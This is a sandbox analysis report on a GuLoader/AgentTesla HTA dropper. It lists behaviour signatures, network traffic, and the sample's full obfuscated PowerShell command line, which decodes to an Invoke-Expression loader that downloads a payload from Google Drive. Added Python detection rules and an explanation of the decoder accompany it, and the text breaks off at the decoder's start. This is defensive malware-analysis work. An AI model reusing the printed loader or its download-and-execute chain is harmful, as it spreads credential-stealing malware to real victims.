Windows Analysis Report
orden_0099896754537687897657436786756785654576.hta

Overview

General Information

Sample name: orden_0099896754537687897657436786756785654576.hta
Analysis ID: 1426816
MD5: 3cab2cb50468a11173f7abb7d63c75b6
SHA1: 4d73453ea724aced202ddc5ef316503e8d54fdfb
SHA256: 6a51343d2fa02ae2b255794576460b49b07ea29e6105abc0816831dbbf3a2197
Tags: agentteslahta

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
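
Read together, the signatures above describe one chain: mshta.exe spawns powershell.exe with a 6335-byte command line, that PowerShell spawns a second PowerShell with the same script, runs cmd.exe to echo %appdata%\Ponos.Lsi, and finally starts wab.exe (Windows Mail) as a suspended host for injection, while the payload asks ip-api.com whether the machine sits in a hosting range. The rule set below is an added example, not part of the Joe Sandbox report, that scores a constructed Sysmon-style process tree and HTTP record built from the process and traffic lines later in this report. PIDs 1224 and 6504 are the PowerShell PIDs the report names; the other PIDs, the explorer.exe root, the command-line length threshold and the filler that pads the command line to the recorded size are assumptions.

```python
"""Process-tree and network detection for the chain this report records:
mshta.exe -> powershell.exe -> powershell.exe -> { cmd.exe echoing %appdata%, wab.exe },
plus the GET ip-api.com/line/?fields=hosting data-centre check. Added example; not part of the report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:           # Sysmon Event ID 1 style fields
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class HttpEvent:           # one request; user_agent == "" when the header is absent
    pid: int
    host: str
    path: str
    user_agent: str


LONG_CMDLINE = 4096        # assumed threshold; the report recorded 6335 bytes
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is(e: ProcEvent, name: str) -> bool:
    return basename(e.image) == name


# (rule name, predicate(event, parent event or None)); the regexes are written against this sample's stage
PROC_RULES = [
    ("mshta_spawns_shell",
     lambda e, p: p is not None and basename(p.image) in SCRIPT_HOSTS and basename(e.image) in SHELLS),
    ("very_long_cmdline", lambda e, p: len(e.cmdline) >= LONG_CMDLINE),
    # 'Substrin' + 'g': the method name is assembled at run time so "Substring" never appears literally
    ("pwsh_split_method_name",
     lambda e, p: _is(e, "powershell.exe") and re.search(r"'Substrin'.{0,40}\+='g'", e.cmdline) is not None),
    # ". ($var) ($arg)": dot-sourcing a variable that holds "iex", i.e. Invoke-Expression by another name
    ("pwsh_indirect_iex",
     lambda e, p: _is(e, "powershell.exe") and re.search(r"\.\s*\(\$\w+\)\s*\(\$\w+\)", e.cmdline) is not None),
    ("cmd_echo_appdata_path",
     lambda e, p: _is(e, "cmd.exe") and re.search(r'/c\s+"?echo\s+%appdata%\\', e.cmdline, re.I) is not None),
    # argument-less Windows Mail binary started by PowerShell: the injection host in this tree
    ("pwsh_spawns_wab", lambda e, p: p is not None and _is(p, "powershell.exe") and _is(e, "wab.exe")),
]


def evaluate(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map each pid to the names of the rules that fired on it."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: [name for name, pred in PROC_RULES if pred(e, by_pid.get(e.ppid))] for e in events}


def hosting_check(h: HttpEvent) -> bool:
    """GET ip-api.com/line/?fields=hosting without a User-Agent: the data-centre check the report flags."""
    return h.host == "ip-api.com" and "fields=hosting" in h.path and not h.user_agent


def verdict(procs, https=()) -> bool:
    """Alert when a script host spawned a shell and the tree also shows staging, injection or the IP check."""
    fired = {name for names in evaluate(procs).values() for name in names}
    corroborating = {"pwsh_spawns_wab", "very_long_cmdline", "pwsh_indirect_iex"}
    return "mshta_spawns_shell" in fired and (bool(fired & corroborating) or any(map(hosting_check, https)))


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# The first five strings are the report's own command line; the last literal is constructed padding.
STAGE = (
    "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';"
    "Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;"
    "For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6))"
    "{$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}"
    "$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}"
    "$Capitalizable=Skftendes '" + "Junkx" * 1200 + "';"
)
HTA = r"C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta"
TREE = [  # constructed; pids 1224 and 6504 are the PowerShell pids the report names
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 900, r"C:\Windows\SysWOW64\mshta.exe", f'mshta.exe "{HTA}"'),
    ProcEvent(1224, 1000, PS, f'"{PS}" "{STAGE}"'),
    ProcEvent(6504, 1224, PS, f'"{PS}" "{STAGE}"'),
    ProcEvent(3608, 6504, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"'),
    ProcEvent(4100, 6504, r"C:\Program Files (x86)\Windows Mail\wab.exe", r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]
HTTP = [HttpEvent(4100, "ip-api.com", "/line/?fields=hosting", "")]
BENIGN = [  # constructed admin activity that must not fire
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1300, 900, PS, f'"{PS}" -NoProfile -Command Get-Date'),
    ProcEvent(1301, 1300, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "echo %appdata%"'),
]

if __name__ == "__main__":
    for pid, names in evaluate(TREE).items():
        print(pid, names)
    print("sample tree:", verdict(TREE, HTTP), "| benign tree:", verdict(BENIGN))
```

The verdict deliberately requires the mshta-to-shell edge plus one corroborating signal, so a long but legitimate administrative script under explorer.exe, or a lone cmd.exe echoing %appdata%, does not alert on its own; the two PowerShell-specific regexes are tuned to this sample's stage and should be treated as sample-specific indicators rather than generic rules.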

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: orden_0099896754537687897657436786756785654576.hta Virustotal: Detection: 8%
Source: unknown HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: svchost.exe, 00000004.00000002.2413923989.000001BF45E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatbXRhj
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1697395646.0000000004AAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443

System Summary

Source: amsi32_6504.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 6335
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6335
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00CBFB98 1_2_00CBFB98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00CBF850 1_2_00CBF850
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248ACF38 17_2_248ACF38
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248A4A80 17_2_248A4A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248A3E68 17_2_248A3E68
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_248A41B0 17_2_248A41B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_271A9B30 17_2_271A9B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_271A1808 17_2_271A1808
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_271A3080 17_2_271A3080
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: amsi32_6504.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winHTA@13/11@3/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Ponos.Lsi
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltlxalh1.220.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1224
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: orden_0099896754537687897657436786756785654576.hta Virustotal: Detection: 8%
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
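
The PowerShell stage in the command lines above builds its real strings at run time. $fostrene is 'Substrin' + 'g', so $Kriminologien.$fostrene.Invoke($i, 1) is Substring($i, 1), and Skftendes returns every sixth character of its argument starting at index 5 and stopping one short of the end; the five characters before each real one are filler. $Aaretags decodes to iex, which makes bifilar a dot-sourced Invoke-Expression wrapper for every decoded fragment. The decoder below is an added example, not part of the report or the sample: the encoder and the script excerpt it decodes are constructed, and the Drive URL is the one in the report's HTTP traffic. One caveat a practitioner will hit: the longer literals as they appear on this page had runs of spaces collapsed in extraction, so they do not decode cleanly from the report text (the $ergometercykelen literal is shown both as printed and with one space restored, which is an assumed repair); decode from the original .hta or from PowerShell script block logs (Event ID 4104) instead.

```python
"""Decoder for the Skftendes() string obfuscation used by the PowerShell stage in this report.

The stage's decoder, stripped of its Danish-word variable names, is:
    Function Skftendes($s){ For($i=5; $i -lt $s.Length-1; $i+=6){ $out+=$s.Substring($i,1) } $out }
Every sixth character (index 5, 11, 17, ...) is real; the five before it are filler, and the final
character (a space) is never read. Added example, not part of the sandbox report or the sample.
"""
import random
import re

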